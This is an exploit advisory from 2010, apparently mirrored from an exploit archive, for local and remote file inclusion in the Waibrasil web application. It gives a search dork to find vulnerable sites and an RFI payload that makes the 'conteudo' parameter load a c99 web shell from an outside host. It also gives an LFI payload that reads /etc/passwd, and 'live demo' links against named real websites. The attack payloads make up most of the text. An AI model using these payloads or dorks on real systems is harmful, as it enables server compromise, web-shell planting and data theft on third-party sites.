Waibrasil Local File Inclusion / Remote File Inclusion

2010-05-1000:00:00
eXeSoul
packetstormsecurity.com
JSON
`  
# Title: Waibrasil Remote / Local File Inclusion  
# Date: 10-05-2010  
# Author: eXeSoul   
# Vendor: www.waibrasil.com.br  
# category: RFI / LFI  
# Version: webapps  
# Tested on: Apcahe/Unix  
# VCE: ()  
# Code : hhttp://thttp://thttp://phttp://:http:////http://http://http://http://http://http://ekin0x.com/c99.txt?   
# Dork : inurl:"index.php?conteudo="  
-----------------------------------------------------------------------------------  
##########################################################################################################  
#Greetz to all Andhra Hackers and ICW Memebers[Indian Cyber Warriors]  
#  
#Thanks:I-H Guru ,SaiSatish,FB1H2S,Micr0,Dark_Blue,c00lt04d,X__HMG,Th3 RDX™,X_Cobra_X,AK-47  
#  
#Shoutz: Notieboi,r45c4l,Yash,M.R SK,Hacker Cyclone,Neo Hacker,S1layer  
#  
#Catch us at www.andhrahackers.com or www.teamicw.in  
##########################################################################################################  
  
Local File Inclusion  
  
Dork:- inurl:"index.php?conteudo="  
  
  
Exploited Link:- http://[site].com/index.php?conteudo=[exploit]  
  
  
exploit:- hhttp://thttp://thttp://phttp://:http:////http://http://http://http://http://http://ekin0x.com/c99.txt?  
  
live demo :- http://gama.org.br/index.php?conteudo=hhttp://thttp://thttp://phttp://:http:////http://http://http://http://http://http://ekin0x.com/c99.txt?  
  
  
  
Dork: inurl:"index.php?conteudo="  
  
Exploit: www.Site.com/index.php?conteudo=[LFI]  
  
Live Demo: http://www.atsurf.com.br/index.php?conteudo=../../../../etc/passwd  
  
  
# eXeSoul mailto: [email protected]  
  
# JAY HIND.!! JAY SHREE RAM.!! JAY SHREE KRISHA.!! JAY MAHADEV.!!  
  
  
# eXploit-db.com [10-5-2010]  
  
`
JSON